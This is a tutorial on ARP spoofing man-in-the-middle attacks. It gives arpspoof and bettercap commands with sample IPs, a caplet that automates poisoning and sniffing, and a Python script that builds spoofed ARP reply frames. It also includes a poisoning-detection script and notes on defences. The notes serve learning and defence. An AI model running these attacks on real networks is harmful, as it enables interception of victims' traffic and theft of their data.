ARP Spoofing

ARP spoofing is a man-in-the-middle (MITM) attack on a local network: you poison the ARP caches of a victim and its gateway so that both send their traffic through your machine.

Test site: http://testphp.vulnweb.com/

ARP Tables

To check the ARP table in Windows or Linux: ``arp -a`` (on modern Linux, ``ip neigh`` shows the same table).

If the table is long, filter it with grep. On Linux every resolved entry contains the word ``ether``, so this keeps the resolved entries and drops the ``<incomplete>`` ones (grep for an IP or MAC instead to find a single host):

arp -a | grep ether

ARP Spoofing Attack

Terms:

Each computer on the network has an ARP table (cache) linking IPs to MACs. The attack poisons this table on two hosts to set up the MITM:

  1. Send the victim a spoofed ARP reply claiming the router's IP is at your MAC. The victim updates its ARP table and associates your MAC with the router's IP.
  2. Send the router a spoofed ARP reply claiming the victim's IP is at your MAC. The router updates its ARP table and associates your MAC with the victim's IP.

This puts you in the middle of the traffic between victim and router: the victim thinks you are the router, and the router thinks you are the victim. The spoofed replies have to be repeated every few seconds, because the real hosts keep answering ARP requests and the poisoned entries would otherwise be overwritten or expire.

Why ARP spoofing works: the protocol itself has no security…

  1. Clients accept ARP replies even if they never sent a request.
  2. Clients trust replies without any verification (no authentication, no check against the existing entry).

So we send an ARP reply to a target and the target does not verify it; it simply updates its ARP table with whatever we sent.
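The two spoofed replies described above, as an added example that is not part of the original notes: a small Python script that builds the raw Ethernet/ARP frames by hand (no scapy), so you can see exactly what arpspoof and bettercap put on the wire, and decodes them back. The MACs and the attacker address are made up; only the 192.168.0.x IPs follow the arpspoof example further down. send_frame() uses a Linux raw socket, needs root, and is only there to show how a frame would be sent; the script never calls it.

```python
"""Hand-built ARP replies for the two halves of a full-duplex ARP spoof.

Added example, not from the original notes: it builds the raw Ethernet/ARP
frames that arpspoof and bettercap send, so the bytes on the wire are visible.
The IPs follow the notes (192.168.0.0/24); every MAC here is constructed.
"""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    """'192.168.0.1' -> 4 raw bytes."""
    parts = [int(p) for p in ip.split(".")]
    if len(parts) != 4 or not all(0 <= p <= 255 for p in parts):
        raise ValueError(f"bad IPv4 address: {ip}")
    return bytes(parts)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Unsolicited ARP reply 'sender_ip is at sender_mac', unicast to the target.

    The target caches sender_ip -> sender_mac without ever having asked
    (the two protocol weaknesses listed in the notes).
    """
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,                  # hardware type: Ethernet
        0x0800,             # protocol type: IPv4
        6, 4,               # hardware / protocol address lengths
        ARP_REPLY,          # opcode 2 = reply
        mac_bytes(sender_mac), ip_bytes(sender_ip),   # the lie: this IP is at my MAC
        mac_bytes(target_mac), ip_bytes(target_ip),
    )
    return eth + arp


def spoof_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two frames of a full-duplex spoof.

    1. to the victim:  'gateway_ip is at attacker_mac'
    2. to the gateway: 'victim_ip is at attacker_mac'
    Both must be re-sent every couple of seconds or the real entries return.
    """
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet+ARP frame back into its fields."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP or len(frame) < 42:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42]
    )
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return {
        "eth_dst": fmt_mac(dst), "eth_src": fmt_mac(src), "oper": oper,
        "sender_mac": fmt_mac(sha), "sender_ip": fmt_ip(spa),
        "target_mac": fmt_mac(tha), "target_ip": fmt_ip(tpa),
    }


def send_frame(frame: bytes, iface: str) -> None:
    """Put a frame on the wire (Linux only, needs root). Never called here."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    # Constructed addresses: the IPs follow the notes, the MACs are made up.
    ATTACKER_MAC = "02:00:00:00:00:aa"
    VICTIM_MAC, VICTIM_IP = "02:00:00:00:00:16", "192.168.0.216"
    GATEWAY_MAC, GATEWAY_IP = "02:00:00:00:00:01", "192.168.0.1"
    for frame in spoof_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP):
        print(frame.hex())
        print(parse_arp(frame))
```

Each frame is 42 bytes: a 14-byte Ethernet header and a 28-byte ARP body. The sender fields carry the lie (the other party's IP next to the attacker's MAC); the Ethernet destination and the target fields make sure only the intended host caches it.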

Tools: arpspoof, bettercap


arpspoof

Syntax (usage is always the same):

arpspoof -i [interface] -t [clientIP] [gatewayIP]  # poisons the client: tells it the gateway's IP is at my MAC
arpspoof -i [interface] -t [gatewayIP] [clientIP]  # poisons the gateway: tells it the client's IP is at my MAC

Example (as root):

arpspoof -i eth0 -t 192.168.0.216 192.168.0.1
arpspoof -i eth0 -t 192.168.0.1 192.168.0.216

NOTE: Run both commands at the same time (two terminals, or background the first) and enable IP forwarding on your machine (on Linux, set the sysctl ``net.ipv4.ip_forward`` to 1) so packets flow through it just like a router. Without forwarding the victim simply loses connectivity, which gives the attack away.


Bettercap

Bettercap can do the same thing as arpspoof and more (see the Bettercap docs).

Bettercap is a framework for running network attacks. Start it with:

Syntax: bettercap -iface [interface]

That drops you at the bettercap prompt. Type help to see the list of modules and help [moduleName] to get help on a specific module.

Module: net.probe (actively discovers connected clients quickly by sending probe packets to every address on the subnet)

Module: net.recon (passively watches the ARP cache for new hosts; net.show lists what has been found so far)


Bettercap ARP Spoof

Module: arp.spoof (for use, at bettercap prompt: “help arp.spoof”)

1. Turn on net.probe if it's not on already

net.probe on

2. Change module parameter for full duplex (spoof client and router, both):

set arp.spoof.fullduplex true

3. Change the module parameter to add your target client IP (because full duplex is set, you only name the client; the gateway/router is picked up automatically):

set arp.spoof.targets [target IP]
# or
set arp.spoof.targets [target IP],[target IP],[target IP]

4. Turn ARP spoofing on (see “help arp.spoof”) and that's it.

arp.spoof on
help #to see the modules running

NOTE: If you check the ARP table on the client you will see the attack machine's MAC associated with the gateway's IP (and, if the attacker's own IP is in the table too, the same MAC behind two IPs).

5. To sniff the traffic (still using bettercap; later we'll use Wireshark):

help net.sniff # see the options
net.sniff on

Test It: VulnWeb (to generate some traffic)
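A check from the victim's side, as an added example that is not from the original notes: this Python script parses ``arp -a`` output in both the Linux and Windows formats and flags a MAC that appears under more than one IP, which is exactly what the NOTE above describes (the attacker's MAC now sitting behind the gateway's IP). It also compares the gateway's cached MAC with one recorded before the attack. The sample tables are constructed; the attacker IP 192.168.0.99 and every MAC are made up.

```python
"""Detect ARP cache poisoning from the victim: one MAC behind several IPs.

Added example, not from the original notes. Parses `arp -a` output (Linux and
Windows formats), reports MACs claimed by more than one IP, and checks whether
the gateway's MAC differs from the one recorded before the attack.
"""
import re
from collections import defaultdict

# Linux:    ? (192.168.0.1) at 02:00:00:00:00:01 [ether] on eth0
# Windows:    192.168.0.1           02-00-00-00-00-01     dynamic
ENTRY_RE = re.compile(
    r"\(?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
    r"(?P<mac>(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})"
)


def parse_arp_table(text: str) -> dict:
    """Return {ip: mac}; MACs normalised to lower-case, colon-separated.

    Lines without a MAC (headers, '<incomplete>' entries) are skipped.
    """
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table


def find_duplicates(table: dict) -> dict:
    """{mac: [ips]} for every MAC that more than one IP resolves to."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(table: dict, gateway_ip: str, known_gateway_mac: str) -> bool:
    """True if the gateway's cached MAC is not the one recorded before the attack."""
    return table.get(gateway_ip, "").lower() != known_gateway_mac.lower()


def report(text: str, gateway_ip: str, known_gateway_mac: str) -> list:
    """Human-readable findings for one `arp -a` dump (empty list = nothing odd)."""
    table = parse_arp_table(text)
    findings = []
    for mac, ips in find_duplicates(table).items():
        findings.append(f"MAC {mac} claimed by {', '.join(ips)}")
    if gateway_changed(table, gateway_ip, known_gateway_mac):
        findings.append(
            f"gateway {gateway_ip} now at {table.get(gateway_ip, '<missing>')}, "
            f"expected {known_gateway_mac}"
        )
    return findings


# Constructed sample output. 192.168.0.1 is the gateway, 192.168.0.99 the attacker.
CLEAN_LINUX = """\
? (192.168.0.1) at 02:00:00:00:00:01 [ether] on eth0
? (192.168.0.10) at 02:00:00:00:00:0a [ether] on eth0
? (192.168.0.50) at <incomplete> on eth0
"""

POISONED_LINUX = """\
? (192.168.0.1) at 02:00:00:00:00:aa [ether] on eth0
? (192.168.0.10) at 02:00:00:00:00:0a [ether] on eth0
? (192.168.0.99) at 02:00:00:00:00:aa [ether] on eth0
"""

POISONED_WINDOWS = """\
Interface: 192.168.0.216 --- 0x5
  Internet Address      Physical Address      Type
  192.168.0.1           02-00-00-00-00-aa     dynamic
  192.168.0.99          02-00-00-00-00-aa     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    for name, dump in [("clean", CLEAN_LINUX), ("linux", POISONED_LINUX), ("windows", POISONED_WINDOWS)]:
        print(name, report(dump, "192.168.0.1", "02:00:00:00:00:01") or ["no sign of poisoning"])
```

A duplicate MAC on its own is not proof (a host with two IP aliases shows the same pattern), which is why the script also compares the gateway entry against the MAC you recorded beforehand; a gateway whose MAC changes mid-session is the strong signal. Static ARP entries for the gateway, or Dynamic ARP Inspection on the switch, are the defences that make the spoof fail outright.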


Bettercap Caplets

Caplets are custom scripts for Bettercap: plain text files with one Bettercap command per line, run in order.

How-To:

  1. Create a text file
  2. On each line put the commands you always run:

Example (to do all of the above automatically when you start Bettercap):

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.0.142
arp.spoof on
net.sniff on

To run it:

bettercap -iface [interface name] -caplet /path/to/caplet.cap